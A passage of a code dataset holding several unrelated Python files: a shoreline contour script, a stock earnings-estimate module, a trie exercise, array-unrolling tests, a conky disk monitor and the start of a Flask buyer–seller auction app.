caseNum==\"5\":\n #get the value of the center point\n avg_elev=0.25 * (top_left_elev + top_right_elev + bottom_left_elev + bottom_right_elev)\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n if avg_elev>0:\n \n line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line2=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n line_list.append(line2)\n else:\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis-0.5*yres]]\n line2=[[mid_x_axis,mid_y_axis+0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n line_list.append(line2)\n elif caseNum==\"10\":\n avg_elev=0.25 * (top_left_elev + top_right_elev + bottom_left_elev + bottom_right_elev)\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n if avg_elev>0:\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis-0.5*yres]]\n line2=[[mid_x_axis,mid_y_axis+0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n line_list.append(line2)\n else:\n line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line2=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n line_list.append(line2)\n elif caseNum==\"1\" or caseNum==\"14\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n elif caseNum==\"2\" or caseNum==\"13\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis,mid_y_axis+0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n elif caseNum==\"3\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n elif caseNum==\"4\" or caseNum==\"11\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n elif caseNum==\"6\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n elif caseNum==\"7\" or caseNum==\"8\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis-0.5*yres]]\n line_list.append(line1)\n elif caseNum==\"9\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n elif caseNum==\"12\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n\nline_json=[]\nall_line_segments=line_list\nprint(\"number of line segment is \",len(all_line_segments))\nwhile len(all_line_segments)>0:\n print(len(line_json),len(all_line_segments))\n #create a list named line_string to store each line\n line_string=[]\n first_pt=all_line_segments[0][0]\n second_pt=all_line_segments[0][1]\n line_string.append(first_pt)\n line_string.append(second_pt)\n all_line_segments.remove(all_line_segments[0])\n\n \n while any(second_pt in sl for sl in all_line_segments):\n for i in range(len(all_line_segments)):\n for j in range(2):\n if all_line_segments[i][j]==second_pt:\n if j==0:\n\n line_string.append(all_line_segments[i][1])\n second_pt=all_line_segments[i][1]\n all_line_segments.remove(all_line_segments[i])\n else:\n line_string.append(all_line_segments[i][0])\n second_pt=all_line_segments[i][0]\n all_line_segments.remove(all_line_segments[i])\n break\n else:\n continue \n break\n while any(first_pt in sl for sl in all_line_segments):\n for i in range(len(all_line_segments)):\n for j in range(2):\n if all_line_segments[i][j]==first_pt:\n if j==0:\n line_string=[all_line_segments[i][1]]+line_string\n first_pt=all_line_segments[i][1]\n all_line_segments.remove(all_line_segments[i])\n else:\n line_string=[all_line_segments[i][0]]+line_string\n first_pt=all_line_segments[i][0]\n all_line_segments.remove(all_line_segments[i])\n break\n else:\n continue\n break\n \n #if the line string is a basin, then we should not append it to the final list\n if line_string[0]==line_string[-1]:\n poly=Polygon([tuple(i) for i in line_string])\n if (line_string[0][0]-ulx)%xres==0:\n pt=Point(line_string[0][0]+0.5*xres,line_string[0][1])\n pt_value=elev_slr(1)[(c_uly-line_string[0][1])//abs(yres)][(line_string[0][0]-c_ulx)//xres]\n if poly.contains(pt):\n if pt_value>0:\n line_json.append(line_string)\n else:\n if pt_value<=0:\n line_json.append(line_string)\n else:\n pt=Point(line_string[0][0],line_string[0][1]+0.5*yres)\n pt_value=elev_slr(1)[(c_uly-line_string[0][1])//abs(yres)][(line_string[0][0]-c_ulx)//xres]\n if poly.contains(pt):\n if pt_value>0:\n line_json.append(line_string)\n else:\n if pt_value<=0:\n line_json.append(line_string)\n \n else:\n line_json.append(line_string)\n\n\nprint(line_json)\n \n\ndata={\n \"type\": \"FeatureCollection\",\n \"features\": [ \n {\n \"type\": \"Feature\", \n \"geometry\":{\n \"type\": \"MultiLineString\",\n \"coordinates\": line_json\n }}]\n }\n\nwith open('/Users/ziyangliu/Downloads/WA_SEW_dems/data_1ft.json', 'w', encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False, indent=4) ","repo_name":"JerryLiu-96/Grays_Harbor_Storymap","sub_path":"assets/shoreline.py","file_name":"shoreline.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72802866473","text":"__author__ = 'xiaofeng'\nimport os\nimport numpy as np\nimport pandas as pd\nimport logging as logging\n\nimport source.common.GlobalConstant as GlobalConstant\nfrom source.common.Utils import Date2Str\nfrom source.common.Utils import Str2Date\nfrom source.common.QDate import FindTradingDay\nfrom source.common.Stock import Stock\nfrom pandas.core.index import InvalidIndexError\n\n\ndef EPFY2Calc(stockId, date):\n return _getEarningEstFromDB_byDate(stockId, date)\n\n#EarningEstCache = None\ndef getEarningsEstFromDB_Bk():\n startDt = GlobalConstant.DataStartDate\n fieldName = 'EPS_AVG'\n\n ## EST_REPORT_DT is not needed if Type has no data error.\n ## However, there are data errors,e.g. ['000629.SZ', '2009-04-03']\n sqlQuery = \"\"\"\n select S_INFO_WINDCODE Ticker, EST_DT, EPS_AVG, S_EST_YEARTYPE Type\n from WindDB.dbo.AShareConsensusData\n where EST_DT>'%s' and CONSEN_DATA_CYCLE_TYP = '263002000'\n order by est_dt\n \"\"\" % startDt\n df = pd.read_sql(sqlQuery, GlobalConstant.DBCONN_WIND)\n stockIDs = np.unique(df.Ticker.tolist())\n\n # dictionary of data frame with stockID being the key\n EarningEstCacheFY1 = {}\n EarningEstCacheFY2 = {}\n EarningEstCacheFY3 = {}\n\n for stockId in stockIDs:\n dfByStk = df[df.Ticker == stockId]\n\n EPFY1 = _getFYFromDataFrame(stockId, dfByStk, 'FY1', fieldName)\n EPFY2 = _getFYFromDataFrame(stockId, dfByStk, 'FY2', fieldName)\n EPFY3 = _getFYFromDataFrame(stockId, dfByStk, 'FY3', fieldName)\n\n EarningEstCacheFY1[stockId] = EPFY1\n EarningEstCacheFY2[stockId] = EPFY2\n EarningEstCacheFY3[stockId] = EPFY3\n\n\ndef _getFYFromDataFrame(stockId, dfByStk, FYType, fieldName):\n maxLagDays = 120 ## shall it be a GlobalConstant ??\n dfByStkFY = dfByStk[dfByStk.Type == FYType]\n ### the following is wrong!!!\n ### I am trying to set Est_DT as index of the dataframe, and then use asof to get the estDt\n estDts = pd.to_datetime(dfByStkFY['EST_DT'], format('%Y%m%d')) # rows are sorted by EST_DT\n data = pd.Series(dfByStkFY[fieldName].tolist(),index=estDts)\n\n EPFY = pd.TimeSeries()\n earningEstFY = np.nan\n dates = GlobalConstant.BacktestDates\n for dt in dates:\n try:\n estDt = data.index.asof(dt) # found the Est_Dt using AsOf\n except InvalidIndexError:\n logging.error('Data Error: ' + stockId + ', ' + Date2Str(dt))\n estDt = Str2Date(\"19000101\")\n\n if estDt is not np.nan and (dt-estDt).days < maxLagDays: # discard it if it is too stale\n earningEstFY = data.ix[estDt] # is this number (earning forecast) an annual number?\n px = Stock.ByWindID(stockId).UnAdjPrice(estDt)\n EPFY[dt] = earningEstFY/px\n\n return EPFY\n\n\n# #todo\ndef _getEarningEstFromDB_byDate(stockId, date, fieldName = 'EPS_AVG'):\n pass\n# '''\n# :param stockId: Wind stock id\n# :param date: a string with format \"yyyymmdd\"\n# :param fieldName: a string\n# :return: a float64\n# '''\n#\n# MaxLagDays = 120 ## shall it be a GlobalConstant ??\n# value = np.nan\n#\n# tradingDt = FindTradingDay(date)\n# tradingDtStr = Date2Str(tradingDt)\n# global EarningEstCache\n# cacheFile = GlobalConstant.DATA_FactorScores_DIR + \"EarningEstCache.dat\"\n#\n# if EarningEstCache is None:\n# if os.path.exists(cacheFile):\n# EarningEstCache = pd.read_pickle(cacheFile) ## it is a pd.Series with index being date\n#\n# if EarningEstCache is None:\n# EarningEstCache = pd.Series() # the cache file doesn't exist\n#\n# if stockId in EarningEstCache:\n# df = EarningEstCache.ix[stockId] ## should allow AsOf, e.g. allow less than 5 days stale\n# if tradingDt in df.index:\n# dt = df.index.asof(tradingDt)\n# if(tradingDt - dt < MaxLagDays): # discard it if it is too stale\n# value = df.ix[dt][fieldName]\n# px = Stock.ByWindID(stockId).UnAdjPrice(dt)\n# ep = value/px\n# return ep\n# return np.nan\n#\n# # we get to this point, so either the cache file doesn't exist or the cache doesn't contain the date\n# # then query database\n# # S_EST_YEARTYPE: FY1, FY2 and FY3\n# # CONSEN_DATA_CYCLE_TYP 263001000: 30 days, 263001000: 90 days, 263001000: 180 days\n# # each row os the table represents a sell side analyst issues a forecast\n# # on any given date, only small portion of stocks would have data\n# # given a stock and a date, the goal is to find the most recent row (consensus forecast) up to that date\n# # all per-share-fields are non-split-adjusted (not confirmed!!!)\n# # EPS_AVG would never be Null\n# # other fields might be Null\n# # deal with EPS_AVG first and then extend to other fields\n#\n# dataStartDt = GlobalConstant.DataStartDate\n# sqlQuery = \"\"\"\n# select EST_DT, EPS_AVG, EST_REPORT_DT\n# from WindDB.dbo.AShareConsensusData\n# where S_INFO_WINDCODE = '%s' and EST_DT>'%s' and CONSEN_DATA_CYCLE_TYP = '263002000' and S_EST_YEARTYPE = 'FY2'\n# order by est_dt\n# \"\"\" % (stockId, dataStartDt)\n# df = pd.read_sql(sqlQuery, GlobalConstant.DBCONN_WIND)\n# #GlobalConstant.DBCONN_WIND.close()\n# df = df.set_index(pd.to_datetime(df['EST_DT'], format('%Y%m%d')))\n# try:\n# dt = df.index.asof(tradingDt)\n# except InvalidIndexError:\n# logging.error('Data Error: ' + stockId + ', ' + Date2Str(tradingDt))\n# dt = \"19000101\"\n# #df = df.drop_duplicates(subset='EST_DT', keep='last', inplace=True) ## argument keep only works with v0.17.0\n# df.drop_duplicates(subset='EST_DT', inplace=True) ## the current version of pd is v0.16.2\n# dt = df.index.asof(tradingDt) ## to reproduce the InvalidIndexError. it is likely a data error, e.g. ['000629.SZ', '2009-04-03']\n#\n# if dt is not np.nan and (tradingDt - dt).days < MaxLagDays: # discard it if it is too stale\n# value = df.ix[dt][fieldName] # is this number (earning forecast) an annual number?\n# px = Stock.ByWindID(stockId).UnAdjPrice(dt)\n# value = value/px\n#\n# EarningEstCache[stockId] = df\n# return value\n\n\ndef SaveEarningEstCache():\n cacheFile = GlobalConstant.DATA_FactorScores_DIR + \"EarningEstCache.dat\"\n pd.to_pickle(EarningEstCache,cacheFile)\n\n\n","repo_name":"dannychua/stockmodel","sub_path":"source/common/Factorlib/EarningsEst.py","file_name":"EarningsEst.py","file_ext":"py","file_size_in_byte":6424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39441583532","text":"#!/usr/bin/python3\n\n\"\"\"\nInput: [zebra, dog, duck, dove]\nOutput: {z, dog, du, dov}\nwhere we can see that\nzebra = z\ndog = dog\nduck = du\ndove = dov\n\"\"\"\n\n\nclass TrieNode:\n def __init__(self):\n self.children = [None] * 26\n self.cnt = 0\n\n\nclass Solution:\n # @param A : list of strings\n # @return a list of strings\n def prefix(self, A):\n # First insert all the words in Trie\n root = TrieNode()\n # import pdb; pdb.set_trace()\n for word in A:\n root = self.insertTrie(root, word)\n\n res = []\n # Find prefix from cnt in Trie\n for word in A:\n res.append(self.prefixTrie(root, word))\n\n return res\n\n def insertTrie(self, root, word):\n if root is None:\n return None\n\n cur = root\n for char in word:\n idx = ord(char) - ord('a')\n if cur.children[idx] is None:\n cur.children[idx] = TrieNode()\n cur.cnt += 1\n cur = cur.children[idx]\n return root\n\n def prefixTrie(self, root, word):\n if root is None:\n return \"\"\n\n res = \"\"\n cur = root\n for char in word:\n idx = ord(char) - ord('a')\n if cur.children[idx]:\n if cur.cnt == 1:\n break\n res += char\n cur = cur.children[idx]\n return res\n\n\nif __name__ == '__main__':\n # Input = [\"zebra\", \"dog\", \"duck\", \"dove\"]\n Input = [\"bearcat\", \"bert\"]\n print(Solution().prefix(Input))\n","repo_name":"hrishikeshtak/Coding_Practises_Solutions","sub_path":"interviewbit/tree/shortest-unique-prefix.py","file_name":"shortest-unique-prefix.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26646031027","text":"\"\"\"Tests for the '_unrolling' module.\"\"\"\nimport pytest\nfrom numpy.testing import assert_array_equal\nimport numpy as np\nfrom mymllib.optimization import unroll, undo_unroll\n\n\na1, a2, a3 = np.arange(10), np.arange(22, 38), np.ones(12)\n# Test matrices\nmatrices = (a1.reshape((2, 5), order='C'), a2.reshape((4, 4), order='C'), a3.reshape((4, 3), order='C'))\n# A one-dimensional array that is expected after unrolling the test matrices\nunrolled_matrices = np.hstack((a1, a2, a3))\n\n\n@pytest.mark.parametrize(\"arrays, expected\", [\n (matrices, unrolled_matrices),\n (np.arange(10), np.arange(10))\n])\ndef test_unroll(arrays, expected):\n result = unroll(arrays)\n\n assert_array_equal(result, expected)\n\n\ndef test_undo_unroll__source_array_not_1D():\n with pytest.raises(ValueError):\n undo_unroll(np.ones((9, 1)), ((3, 3),))\n\n\n@pytest.mark.parametrize(\"source_array, shapes\", [\n (np.ones(100), ((5, 7), (3, 6))), # Source array contains more elements than specified by shapes\n (np.ones(10), ((4, 3),)), # Source array contains less elements than specified by shapes\n])\ndef test_undo_unroll__invalid_shapes(source_array, shapes):\n with pytest.raises(ValueError):\n undo_unroll(source_array, shapes)\n\n\n@pytest.mark.parametrize(\"source_array, shapes, expected\", [\n (unrolled_matrices, [matrix.shape for matrix in matrices], matrices),\n (np.arange(10), [(10,)], (np.arange(10),))\n])\ndef test_undo_unroll(source_array, shapes, expected):\n result = undo_unroll(source_array, shapes)\n\n for i in range(len(expected)):\n assert_array_equal(result[i], expected[i])\n","repo_name":"OlegPonomaryov/mymllib","sub_path":"mymllib/optimization/_tests/_unrolling_test.py","file_name":"_unrolling_test.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1770594784","text":"#!/usr/bin/env python\n\nimport os, string\nfrom sh import mount, lsblk\n\n## show debug messages\nDEBUG=False\ndemo_mode = True # setting this to true hides partition labels and uses generic dev entries.\n\n# CODE\nMODULE= \"StorageMonitor\"\n\n\n# this one prints debug output\ndef printd(dstr):\n\tif DEBUG:\n\t\tprint(\"[%s]: %s\" % (MODULE, dstr))\n\ndef real_fs(part):\n\tinfo = lsblk(\"-no\", \"name,fstype\", part).strip()\n\tinfo = info.split(\" \")\n\tprintd(info)\n\t\n\treturn info[1]\n\ndef parse_mounts():\n\tmountpoints = []\n\tout = mount().strip().split(\"\\n\")\n\t\n\tfor o in out:\n\t\to1 = o.split(\" on \")\t\t\n\t\t\n\t\to2 = o1[1].split(\" type \")\n\t\tshort_mount = o2[0].strip().replace(\"/run/media/igor/\", \"\")\n\t\tshort_mount = short_mount.replace(\"/media/\", \"\")\n\t\t\n\t\to3 = o2[1].split();\n\t\tif o3[0] == \"fuseblk\":\n\t\t\tfs = real_fs(o1[0].strip())\n\t\telse:\n\t\t\tfs = o3[0].strip()\n\t\t\n\t\tmountpoints.append({\"drive\": o1[0].strip(), \"mount\": o2[0].strip(), \"short_mount\": short_mount, \"fs\": fs})\n\t\n\treturn mountpoints\n\nmountpoints = parse_mounts()\nto_print = \"${goto 35}Disk/Mount pt.${goto 160}Type${goto 195}Total${goto 240}Used${goto 285}Free\\n\"\nto_print += \"${voffset -8}${goto 35}${color1}${hr 1}\\n\"\n# loop all sd{a..z} devices\nfor major in string.ascii_lowercase:\n\tdrive = \"/dev/sd%s\" % major\n\t\n\t# check if /dev/sdX exists\n\tif os.path.exists(drive):\n\t\thas_mounted_parts = False\n\t\t# loop all sdX{0-9} devices\n\t\tfor minor in string.digits:\n\t\t\tpartition = \"%s%s\" % (drive, minor)\n\t\t\t\n\t\t\t# now, check if it's mounted\n\t\t\tif os.path.exists(partition):\n\t\t\t\tprintd(\"checking %s\" % partition)\n\t\t\t\tmounted = False\n\t\t\t\tdev = None\n\t\t\t\t\n\t\t\t\tfor pt in mountpoints:\n\t\t\t\t\tif pt['drive'] == partition:\n\t\t\t\t\t\tdev = pt\n\t\t\t\t\t\tmounted = True\n\t\t\t\t\t\t\n\t\t\t\tprintd(\"is %s mounted? %s\" % (partition, str(mounted)))\n\t\t\t\t\n\t\t\t\t# if partition is mounted, show info\n\t\t\t\tif mounted:\n\t\t\t\t\t# add descriptive block before, because we don't want to show drives which aren't mounted\n\t\t\t\t\tif not has_mounted_parts:\n\t\t\t\t\t\tto_print += \"${goto 35}${color1}%s${color} (${color1}${diskio_write %s}${color} in, ${color1}${diskio_read %s}${color} out)\\n\" % (drive, drive, drive)\n\t\t\t\t\t\tto_print += \"${voffset -8}${goto 35}${color0}${hr 1}\\n\"\n\t\t\t\t\t\thas_mounted_parts = True\n\t\t\t\t\t# partition info now...\n\t\t\t\t\tif not demo_mode:\n\t\t\t\t\t\tmnt = dev['short_mount'][:100]+\"...\" if len(dev['short_mount']) > 100 else dev['short_mount']\n\t\t\t\t\telse:\n\t\t\t\t\t\tmnt = \"sd%s%s\" % (major, minor)\n\t\t\t\t\t\n\t\t\t\t\tto_print += \"${goto 35}|-${color1}%s${goto 162}%s${goto 192}${fs_size %s}${goto 237}${fs_used %s}${goto 282}${fs_free %s}${color}\\n\" % (mnt, dev['fs'][:5], dev['mount'], dev['mount'], dev['mount'])\n\t\t\telse:\n\t\t\t\tprintd(\"%s doesn't exist\" % partition)\n\t\tto_print += \"${voffset 5}\"\n\telse:\n\t\tprintd(\"%s doesn't exist\" % drive)\n\n# output\nprint(to_print)\n","repo_name":"ShadySquirrel/conky","sub_path":"storage_monitor.py","file_name":"storage_monitor.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9500116292","text":"from flask import Flask, render_template, request, redirect\nfrom flask_bootstrap import Bootstrap\nimport haversine as hs\nimport json\napp = Flask(__name__)\nBootstrap(app)\n\nclass BuyerTransaction:\n def __init__(self, idx, buyerIdx, v, vmin, vmax, bmin, bmax):\n self.status = 'pending'\n self.idx = idx\n self.buyerIdx = buyerIdx\n self.v = v\n self.vmax = vmax\n self.vmin = vmin\n self.bmin = bmin\n self.bmax = bmax\n self.agreedTransactionIdx = None\n self.T = None\n self.distance = None\n self.optimalAmount = None\n \n def __repr__(self):\n return \"status: {}, idx: {}, buyerIdx: {}, v: {}, vmax: {}, vmin: {}, bmin: {}, bmax: {}\".format(self.status,\n self.idx, self.buyerIdx, self.v, self.vmax, self.vmin, self.bmin, self.bmax) \n \n def changeStatusToAccepted(self):\n self.status = 'accepted'\n print('Seller transaction: '+str(self.idx)+' , status has been changed to \"Accepted\"')\n\n def changeStatusToComplete(self):\n self.status = 'completed'\n print('Buyer transaction: '+str(self.idx)+' , status has been changed to \"Completed\"')\n\nclass SellerTransaction:\n def __init__(self, idx, parentTransactionIdx, sellerIdx, c, cmin, cmax, smin, smax):\n self.status = 'pending'\n self.idx = idx\n self.sellerIdx = sellerIdx\n self.parentTransactionIdx = parentTransactionIdx\n self.c = c\n self.cmax = cmax\n self.cmin = cmin\n self.smin = smin\n self.smax = smax\n self.P = None\n self.R = None\n self.T = None\n self.optimalAmount = None\n self.distance = None\n\n def __repr__(self):\n return \"status: {}, idx: {}, sellerIdx: {}, parentTransactionIdx: {}, c: {}, cmax: {}, cmin: {}, smin: {}, smax: {}, P: {}, R: {}, T: {}, amount: {} \".format(self.status,\n self.idx, self.sellerIdx, self.parentTransactionIdx, self.c, self.cmax, self.cmin, self.smin, self.smax, self.P, self.R, self.T, self.optimalAmount)\n\nclass Buyer:\n def __init__(self, coordinate, idx):\n self.coordinate = coordinate\n self.idx = idx\n\n def __repr__(self):\n return \"idx: {}, coordinate: {}\".format(self.coordinate, self.idx)\n \n def createBuyerTransaction(self, transactionIdx,v, vmin, vmax, bmin, bmax):\n return BuyerTransaction(transactionIdx, self.idx, v, vmin, vmax, bmin, bmax)\n\n\nclass Seller:\n def __init__(self, coordinate, idx):\n self.coordinate = coordinate\n self.idx = idx\n \n def __repr__(self):\n return \"idx: {}, coordinate: {}\".format(self.coordinate, self.idx)\n\n def createSellerTransaction(self, transactionIdx, parentTransactionIdx, c, cmin, cmax, smin, smax):\n return SellerTransaction(transactionIdx, parentTransactionIdx, self.idx, c, cmin, cmax, smin, smax)\n\nclass Auctioneer:\n def __init__(self):\n self.location = []\n self.buyerTransaction = []\n self.sellerTransaction = []\n self.countBuyerTransaction = 5\n self.countSellerTransaction = 5\n self.buyers = []\n self.sellers = []\n \n def bt(self): return self.buyerTransaction\n def st(self): return self.sellerTransaction\n \n def fetchBuyerTransaction(self, idx):\n buyerTransaction = None\n for transaction in self.buyerTransaction:\n if(transaction.idx == idx):\n buyerTransaction = transaction\n return buyerTransaction\n if(buyerTransaction == None): \n print(\"Can not find buyerTransaction\")\n return False\n \n def fetchSellerTransaction(self, idx):\n sellerTransaction = None\n for transaction in self.sellerTransaction:\n if(transaction.idx == idx):\n sellerTransaction = transaction\n return sellerTransaction\n if(sellerTransaction == None): \n print(\"Can not find sellerTransaction\")\n return False\n \n def fetchSellerTransactionsByParentTransactionIdx(self, parentTransactionIdx):\n return [transaction for transaction in self.sellerTransaction if transaction.parentTransactionIdx == parentTransactionIdx]\n \n \n def computeSellerResponse(self, sellerTransacionIdx):\n sellerTransaction = self.fetchSellerTransaction(sellerTransacionIdx)\n buyerTransaction = self.fetchBuyerTransaction(sellerTransaction.parentTransactionIdx)\n sellerLocation = self.sellers[sellerTransaction.sellerIdx-1].coordinate\n buyerLocation = self.buyers[buyerTransaction.buyerIdx-1].coordinate\n sellerTransaction.distance = round(hs.haversine(sellerLocation,buyerLocation), 2)\n\n sellerTransaction.P = round(buyerTransaction.vmax/12 + sellerTransaction.cmin/4 + (2*buyerTransaction.v)/3,2)\n sellerTransaction.R = round(sellerTransaction.cmin/12 + buyerTransaction.vmax/4 + (2*sellerTransaction.c)/3)\n\n if((sellerTransaction.P < sellerTransaction.R) or (sellerTransaction.smin > buyerTransaction.bmax) or (buyerTransaction.bmin > sellerTransaction.smax)):\n print(\"Transction failed!\")\n sellerTransaction.status = \"failed\"\n return False\n \n sellerTransaction.T = (sellerTransaction.P + sellerTransaction.R)/2\n sellerTransaction.optimalAmount = round((((sellerTransaction.cmax - sellerTransaction.c)/sellerTransaction.cmax)*sellerTransaction.smax + ((1-((sellerTransaction.cmax - buyerTransaction.v)/sellerTransaction.cmax))*buyerTransaction.bmax))/2)\n print(\"Transction accepted!\")\n sellerTransaction.status = 'accepted'\n return True\n \n def completeBuyerTransaction(self, sellerTransactionIdx):\n sellerTransaction = self.fetchSellerTransaction(sellerTransactionIdx)\n buyerTransaction = self.fetchBuyerTransaction(sellerTransaction.parentTransactionIdx)\n if(sellerTransaction.status == 'accepted'):\n sellerTransaction.status = 'completed'\n buyerTransaction.status = 'completed'\n buyerTransaction.agreedTransactionIdx = sellerTransaction.idx\n buyerTransaction.T = sellerTransaction.T\n buyerTransaction.distance = sellerTransaction.distance\n buyerTransaction.optimalAmount = sellerTransaction.optimalAmount\n for transaction in self.fetchSellerTransactionsByParentTransactionIdx(sellerTransaction.parentTransactionIdx):\n if(transaction.idx != sellerTransaction.idx):\n transaction.status = 'failed'\n return True\n else: return False\n \n def getAcceptedTransaction(self, BuyerIdx):\n sellerTransaction = []\n for transaction in self.sellerTransaction:\n if(transaction.parentTransactionIdx == BuyerIdx and transaction.status == 'accepted'):\n sellerTransaction.append(transaction)\n \n if(sellerTransaction == None): return False\n else : return [ transaction.__dict__ for transaction in sellerTransaction ]\n \n def getBuyerPendingTransaction(self, idx):\n b_transaction = []\n for buyerTransaction in [transaction.__dict__ for transaction in self.buyerTransaction if transaction.buyerIdx == idx and transaction.status == 'pending']:\n b_transaction.append(buyerTransaction)\n for sellerTransaction in [transaction.__dict__ for transaction in self.sellerTransaction if transaction.parentTransactionIdx == buyerTransaction['idx'] and transaction.status == 'accepted']:\n b_transaction.append(sellerTransaction)\n return b_transaction\n \n def getBuyerCompletedTransaction(self, idx):\n b_transaction = []\n for buyerTransaction in [transaction.__dict__ for transaction in self.buyerTransaction if transaction.buyerIdx == idx]:\n if(buyerTransaction['status'] == 'completed'):\n b_transaction.append(buyerTransaction)\n return b_transaction\n \n def getSellerPendingTransaction(self, idx):\n b_transaction = []\n sellerLocation = self.sellers[idx-1].coordinate\n s_transactionIdxs = [sellerTransaction.parentTransactionIdx for sellerTransaction in self.sellerTransaction if sellerTransaction.sellerIdx == idx]\n for buyerTransaction in self.buyerTransaction:\n if( (buyerTransaction.idx not in s_transactionIdxs) and (buyerTransaction.status == 'pending')):\n buyerLocation = self.buyers[buyerTransaction.buyerIdx-1].coordinate\n distance = round(hs.haversine(sellerLocation,buyerLocation), 2)\n buyerTransactionDict = buyerTransaction.__dict__\n buyerTransactionDict['distance'] = distance\n b_transaction.append(buyerTransactionDict)\n return b_transaction\n \n def getSellerAcceptedTransaction(self, idx):\n return [ transaction.__dict__ for transaction in self.sellerTransaction if transaction.status == 'accepted' and transaction.sellerIdx == idx]\n \n def getSellerCompleltedFailedTransaction(self, idx):\n return [ transaction.__dict__ for transaction in self.sellerTransaction if transaction.status in ['completed', 'failed'] and transaction.sellerIdx == idx]\n \n def getAuctioneerPendingTransaction(self):\n pendingTransaction = [transaction.__dict__ for transaction in self.buyerTransaction if transaction.status == 'pending']\n acceptedTransaction = [transaction.__dict__ for transaction in self.sellerTransaction if transaction.status == 'accepted']\n return pendingTransaction+acceptedTransaction\n \n def getAuctioneerCompletedTransaction(self):\n return [transaction.__dict__ for transaction in self.buyerTransaction if transaction.status == 'completed']\n \n def getAuctioneerFailedTransaction(self):\n return [transaction.__dict__ for transaction in self.sellerTransaction if transaction.status == 'failed']\n\n def createBuyerTransaction(self, transactionIdx, buyerIdx, v, vmin, vmax, bmin, bmax):\n newTransaction = BuyerTransaction(transactionIdx, buyerIdx, v, vmin, vmax, bmin, bmax)\n self.buyerTransaction.append(newTransaction)\n return True\n \n def createSellerTransaction(self, transactionIdx, parentTransactionIdx, sellerIdx, c, cmin, cmax, smin, smax):\n newTransaction = SellerTransaction(transactionIdx, parentTransactionIdx, sellerIdx, c, cmin, cmax, smin, smax)\n self.sellerTransaction.append(newTransaction)\n self.computeSellerResponse(newTransaction.idx)\n return True\n\n#dummy data\ndummyBuyerTransaction = [BuyerTransaction(1, 1, v=5, vmin=1, vmax=10, bmin=30, bmax=150),\n BuyerTransaction(2, 2, v=10, vmin=2, vmax=20, bmin=10, bmax=100),\n BuyerTransaction(3, 3, v=30, vmin=3, vmax=30, bmin=20, bmax=200),\n BuyerTransaction(4, 4, v=40, vmin=4, vmax=40, bmin=30, bmax=300),\n BuyerTransaction(5, 5, v=50, vmin=5, vmax=50, bmin=40, bmax=400)]\n \ndummySellerTransaction = [SellerTransaction(1, 1, 1, c=3, cmin=1, cmax=10, smin=30, smax=150),\n SellerTransaction(2, 1, 2, c=3, cmin=2, cmax=16, smin=10, smax=100),\n SellerTransaction(3, 1, 3, c=2, cmin=3, cmax=15, smin=20, smax=200),\n SellerTransaction(4, 4, 4, c=40, cmin=4, cmax=40, smin=30, smax=300),\n SellerTransaction(5, 5, 5, c=50, cmin=5, cmax=50, smin=40, smax=400)]\n\n#dummy data\nbuyers = [Buyer((13.7203636, 100.4983167), 1), Buyer((13.7210854,100.4952133), 2), Buyer((13.7057435,100.4809689), 3), Buyer((13.6562446,100.4817984), 4), Buyer((13.7213584,100.5305075), 5)]\nsellers = [Seller((13.651362879156872,100.49486250045186),1), Seller((13.7057435,100.4809689), 2), 